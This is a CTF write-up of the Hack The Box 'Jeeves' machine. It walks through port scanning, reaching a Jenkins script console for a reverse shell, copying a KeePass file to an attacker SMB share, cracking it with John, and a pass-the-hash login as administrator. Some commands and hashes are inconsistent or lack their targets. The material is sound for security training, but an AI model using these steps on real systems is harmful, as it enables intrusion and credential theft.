Jeeves is not overly complicated, however, it focuses on some interesting techniques and provides a great learning experience. As the use of alternate data streams is not very common, some users may have a hard time locating the correct escalation path.


First I check for available open ports.

nmap -p- --min-rate=10000

nmap -sC -sV -p80,135,445,50000 -oA ./nmap/jeeves -Pn

Ports Service
80 msrpc Microsoft IIS httpd 10.0
135 msrpc Microsoft Windows RPC
445 Windows Server 2016 Standard 14393
50000 Jetty 9.4.z-SNAPSHOT

First I checked SMB server and there was no listing of anonymous sign-in.

I also ran Enum4linux-NG to make sure and it also enumarate RPC for me.

enum4linux-ng -A -C

Next, I visited port 80. It shows AskJeeves search but if something is searched on the toolbar it redirects to /error.html? .

You can’t click or select on the screen. After seeing the source code we can confirm it’s just an image jeeves.PNG.

Next, I visited port 50000. It gives a 404 error.


I did a Dirsearch on both ports 80 & 500000 and found /askjeeves .

dirsearch -u -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -t 20 -f -e php,txt,html,aspx

After visiting the directory we are met with the Jenkins dashboard.

We can go to /askjeeves/script and find the script console. We can get a reverse shell using the following script.

I set up Netcat listening on my local machine and after hitting run we can get a reverse shell.

I got the user.txt

Privilege Escalation

After looking for a bit I found CEH.kdbx file. This is the Keepass db file.

I transferred the file using impacket-smbserver.

Attacker Machine
sudo impacket-smbserver share -smb2support /tmp/ -user test -password test

Target Machine
copy C:\Users\kohsuke\Documents\CEH.kdbx \\\share\

I tried to open the file with KeePassXC but it was password locked.

I extracted the password hash of the file and then brute-forced it with John().

keepass2john CEH.kdbx >> hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Password → moonshine1

I used the credential to open the file and found an NTLM hash.

NTLM → afbc5bd4b615a60648cec41c6ac92530

I used PSEXEC to do a PassTheHash attack to get into the admin user. [email protected] -hashes :e0fb1fb85756c24235ff238cbe81fe00

When I went to get the flag I saw a text to find the flag elsewhere.

I checked for hidden files and found hm.txt:root.txt:$DATA.

This is an alternative data stream. I the flag using Get-Content .

powershell (Get-Content hm.txt -Stream root.txt).substring(0,32)

or more < hm.txt:root.txt